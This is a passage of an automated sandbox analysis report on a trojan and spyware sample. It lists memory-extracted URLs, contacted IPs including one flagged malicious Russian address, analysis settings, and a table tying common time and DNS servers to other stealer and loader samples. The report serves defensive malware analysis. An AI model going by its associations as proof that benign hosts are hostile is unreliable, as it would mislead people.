                                                                                                                                                  http://anglebug.com/7556chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://chromewebstore.google.com/chrome.exe, 00000013.00000002.1874625312.0000422C00013000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000002.1902875706.0000341C00020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://drive-preprod.corp.google.com/manifest.json0.32.drfalse
                                                                                                                                                        		high
                                                                                                                                                        http://127.0.0.1:8000/254d3199/14c90ac50(pchrome.exe, 00000013.00000002.1879409281.0000422C009D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        https://chrome.google.com/webstore4msedge.exe, 00000016.00000002.1902875706.0000341C00020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://clients4.google.com/chrome-syncchrome.exe, 00000013.00000002.1875915640.0000422C001AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://permanently-removed.invalid/RotateBoundCookiesmsedge.exe, 00000016.00000003.1891357678.0000341C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890857506.0000341C0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890151780.0000341C00268000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://anglebug.com/6692chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://issuetracker.google.com/258207403chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://anglebug.com/4324YDchrome.exe, 00000013.00000002.1877240234.0000422C00444000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  		unknown
                                                                                                                                                                  http://anglebug.com/3502chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://anglebug.com/3623chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://anglebug.com/3625chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://anglebug.com/3624chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://anglebug.com/5007chrome.exe, 00000013.00000002.1877723507.0000422C005A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://chrome.google.com/webstore?hl=en-GBchrome.exe, 00000013.00000002.1879180867.0000422C0093C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1879409281.0000422C009D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://anglebug.com/3862chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://chrome.google.com/webstoreLDDiscoverchrome.exe, 00000013.00000003.1860050167.0000422C00C88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1875436417.0000422C00108000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1880032931.0000422C00A7B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1878881660.0000422C00874000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858747770.0000422C00C88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1881369455.0000422C00CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1876141419.0000422C00284000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1882738549.0000422C00E78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1876602417.0000422C00328000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://www.ecosia.org/search?q=&addon=opensearchchrome.exe, 00000013.00000002.1881066611.0000422C00C0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://127.0.0.1:8000/254d3199/14c90ac5Ychrome.exe, 00000013.00000002.1883994313.0000594000238000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    http://anglebug.com/4836chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://issuetracker.google.com/issues/166475273chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://ch.search.yahoo.com/favicon.icochrome.exe, 00000013.00000002.1878349012.0000422C006EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://msn.com/msedge.exe, 00000016.00000002.1905572634.0000341C002C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            http://anglebug.com/4384chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877240234.0000422C00444000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://permanently-removed.invalid/reauth/v1beta/users/4msedge.exe, 00000016.00000003.1891357678.0000341C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890857506.0000341C0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890151780.0000341C00268000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              http://anglebug.com/35025chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              http://anglebug.com/3970chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877240234.0000422C00444000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePWchrome.exe, 00000013.00000002.1878518613.0000422C00774000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877281886.0000422C00474000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certschrome.exe, 00000013.00000002.1879088256.0000422C008F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://anglebug.com/7604chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      http://anglebug.com/7761chrome.exe, 00000013.00000002.1877723507.0000422C005A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        http://anglebug.com/7760chrome.exe, 00000013.00000002.1877723507.0000422C005A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://go.micsvchost.exefalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icosvchost.exe, 0000000F.00000003.1860719211.000001C278678000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877687874.0000422C00584000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877373539.0000422C00494000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1880785922.0000422C00B60000.00000004.00000800.00020000.00000000.sdmp, Web Data.25.drfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              http://anglebug.com/5901chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                http://anglebug.com/3965chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  http://anglebug.com/6439chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    http://anglebug.com/7406chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://anglebug.com/7161chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        https://drive-autopush.corp.google.com/manifest.json0.32.drfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          https://anglebug.com/7162chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            http://anglebug.com/5906chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                              http://anglebug.com/2517chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                https://permanently-removed.invalid/MergeSessionmsedge.exe, 00000016.00000003.1891357678.0000341C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890857506.0000341C0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890151780.0000341C00268000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  		high

                                                                                                                                                                                                                                  World Map of Contacted IPs

                                                                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                                                                                                  Public IPs

                                                                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                  94.198.159.10
                                                                                                                                                                                                                                  		ntp.time.nlNetherlands
                                                                                                                                                                                                                                  		1140SIDNNLfalse
                                                                                                                                                                                                                                  194.58.203.20
                                                                                                                                                                                                                                  		gbg1.ntp.netnod.seSweden
                                                                                                                                                                                                                                  		57021NTP-SEAnycastedNTPservicesfromNetnodIXPsSEfalse
                                                                                                                                                                                                                                  94.245.104.56
                                                                                                                                                                                                                                  		ssl.bingadsedgeextension-prod-europe.azurewebsites.netUnited Kingdom
                                                                                                                                                                                                                                  		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                  129.6.15.28
                                                                                                                                                                                                                                  		time-a-g.nist.govUnited States
                                                                                                                                                                                                                                  		49US-NATIONAL-INSTITUTE-OF-STANDARDS-AND-TECHNOLOGYUSfalse
                                                                                                                                                                                                                                  129.134.25.123
                                                                                                                                                                                                                                  		time.facebook.comUnited States
                                                                                                                                                                                                                                  		32934FACEBOOKUSfalse
                                                                                                                                                                                                                                  129.250.35.250
                                                                                                                                                                                                                                  		x.ns.gin.ntt.netUnited States
                                                                                                                                                                                                                                  		2914NTT-COMMUNICATIONS-2914USfalse
                                                                                                                                                                                                                                  216.239.35.0
                                                                                                                                                                                                                                  		time.google.comUnited States
                                                                                                                                                                                                                                  		15169GOOGLEUSfalse
                                                                                                                                                                                                                                  162.159.200.123
                                                                                                                                                                                                                                  		time.cloudflare.comUnited States
                                                                                                                                                                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                  162.159.61.3
                                                                                                                                                                                                                                  		chrome.cloudflare-dns.comUnited States
                                                                                                                                                                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                  92.255.85.148
                                                                                                                                                                                                                                  		unknownRussian Federation
                                                                                                                                                                                                                                  		42097SOVTEL-ASRUtrue
                                                                                                                                                                                                                                  239.255.255.250
                                                                                                                                                                                                                                  		unknownReserved
                                                                                                                                                                                                                                  		unknownunknownfalse
                                                                                                                                                                                                                                  172.217.17.65
                                                                                                                                                                                                                                  		googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                                                                                                  		15169GOOGLEUSfalse

                                                                                                                                                                                                                                  Private

                                                                                                                                                                                                                                  IP
                                                                                                                                                                                                                                  127.0.0.1

                                                                                                                                                                                                                                  General Information

                                                                                                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                  Analysis ID:1577525
                                                                                                                                                                                                                                  Start date and time:2024-12-18 14:53:30 +01:00
                                                                                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                  Overall analysis duration:0h 10m 53s
                                                                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                  Report type:full
                                                                                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                  Number of analysed new started processes analysed:38
                                                                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                                                                                  Technologies:
                                                                                                                                                                                                                                  • HCA enabled
                                                                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                                                                  Sample name:HI6VIJERUn.exe
                                                                                                                                                                                                                                  renamed because original name is a hash value
                                                                                                                                                                                                                                  Original Sample Name:7f714d1fe31c0e0b58f6e98c86717c8e62dcf722513de35d25e9f31330d4027f.exe
                                                                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@96/257@15/13
                                                                                                                                                                                                                                  EGA Information:
                                                                                                                                                                                                                                  • Successful, ratio: 71.4%
                                                                                                                                                                                                                                  HCA Information:
                                                                                                                                                                                                                                  • Successful, ratio: 80%
                                                                                                                                                                                                                                  • Number of executed functions: 194
                                                                                                                                                                                                                                  • Number of non-executed functions: 188
                                                                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                                                                  • Found application associated with file extension: .exe

                                                                                                                                                                                                                                  Warnings

                                                                                                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 40.81.94.65, 216.58.208.227, 172.217.17.78, 64.233.162.84, 13.107.42.16, 204.79.197.239, 13.107.21.239, 13.107.6.158, 23.216.77.154, 23.216.77.168, 142.250.65.227, 142.250.72.99, 4.175.87.197, 92.122.16.236, 13.107.246.63, 23.44.136.156
                                                                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): cdp-f-ssl-tlu-net.trafficmanager.net, config.edge.skype.com.trafficmanager.net, slscr.update.microsoft.com, twc.trafficmanager.net, clientservices.googleapis.com, star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, clients2.google.com, config-edge-skype.l-0007.l-msedge.net, msedge.b.tlu.dl.delivery.mp.microsoft.com, www.gstatic.com, l-0007.l-msedge.net, config.edge.skype.com, edge-microsoft-com.dual-a-0036.a-msedge.net, fs.microsoft.com, accounts.google.com, bingadsedgeextension-prod.trafficmanager.net, otelrules.azureedge.net, api.edgeoffer.microsoft.com, star.sb.tlu.dl.delivery.mp.microsoft.com.edgesuite.net, ctldl.windowsupdate.com, b-0005.b-msedge.net, edge.microsoft.com, business-bing-com.b-0005.b-msedge.net, fe3cr.delivery.mp.microsoft.com, l-0007.config.skype.com, a2033.dscd.akamai.net, business.bing.com, clients.l.google.com, msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com, dual-a-0036.a-msedge.net
                                                                                                                                                                                                                                  • Execution Graph export aborted for target Hop.com, PID 5732 because there are no executed function
                                                                                                                                                                                                                                  • Execution Graph export aborted for target Hop.com, PID 5924 because there are no executed function
                                                                                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                  • VT rate limit hit for: HI6VIJERUn.exe

                                                                                                                                                                                                                                  Simulations

                                                                                                                                                                                                                                  Behavior and APIs

                                                                                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                                                                                  08:54:44API Interceptor1x Sleep call for process: HI6VIJERUn.exe modified
                                                                                                                                                                                                                                  08:55:57API Interceptor1x Sleep call for process: wmplayer.exe modified

                                                                                                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                                                                                                  IPs

                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                  94.198.159.10List of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                    download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                      194.58.203.20List of required items and services pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                        ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                          download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                            94.245.104.5617333253674c71ac3d5875ca830e11f4630bf65d3b8b7e2686361e216df980d330c80afb30623.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                              oLY6JbNl9i.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                9aTcxCmLgM.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  4l5IFxl9t3.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    B3N4x4meoJ.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      098aPtSbmd.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                        loader.ps1.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                          ton.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                            mtbkkesfthae.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                              pyjnkasedf.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                129.6.15.28payload_1.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                  wE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                    Payload 94.75 (4).225.exeGet hashmaliciousKronos, Strela StealerBrowse
                                                                                                                                                                                                                                                                      mirai_nomiGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                        SecuriteInfo.com.Other.Malware-gen.28386.14039.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                          SecuriteInfo.com.Other.Malware-gen.3200.4135.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                            SecuriteInfo.com.Other.Malware-gen.31307.16494.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                              SecuriteInfo.com.Linux.Siggen.6954.6684.13146.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                SecuriteInfo.com.Other.Malware-gen.22921.14172.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                  PrHBHHWE5U.elfGet hashmaliciousMiraiBrowse

                                                                                                                                                                                                                                                                                    Domains

                                                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                    time.cloudflare.compayload_1.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                    • 162.159.200.123
                                                                                                                                                                                                                                                                                    List of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                    • 162.159.200.123
                                                                                                                                                                                                                                                                                    ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                    • 162.159.200.1
                                                                                                                                                                                                                                                                                    download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                    • 162.159.200.1
                                                                                                                                                                                                                                                                                    chrome.cloudflare-dns.comko.ps1.2.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                    • 162.159.61.3
                                                                                                                                                                                                                                                                                    NativeApp_G5L1NHZZ.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                                                                                                                    urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                                                                                                                                                    • 162.159.61.3
                                                                                                                                                                                                                                                                                    EXTERNALRe.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                    • 162.159.61.3
                                                                                                                                                                                                                                                                                    YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                                                                                                                    CapCut_12.0.4_Installer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                                                                                                                    CapCut_12.0.4_Installer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                                    • 162.159.61.3
                                                                                                                                                                                                                                                                                    122046760.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                    • 162.159.61.3
                                                                                                                                                                                                                                                                                    pkqLAMAv96.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                    • 162.159.61.3
                                                                                                                                                                                                                                                                                    IIC0XbKFjS.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                    • 162.159.61.3
                                                                                                                                                                                                                                                                                    gbg1.ntp.netnod.seList of required items and services pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
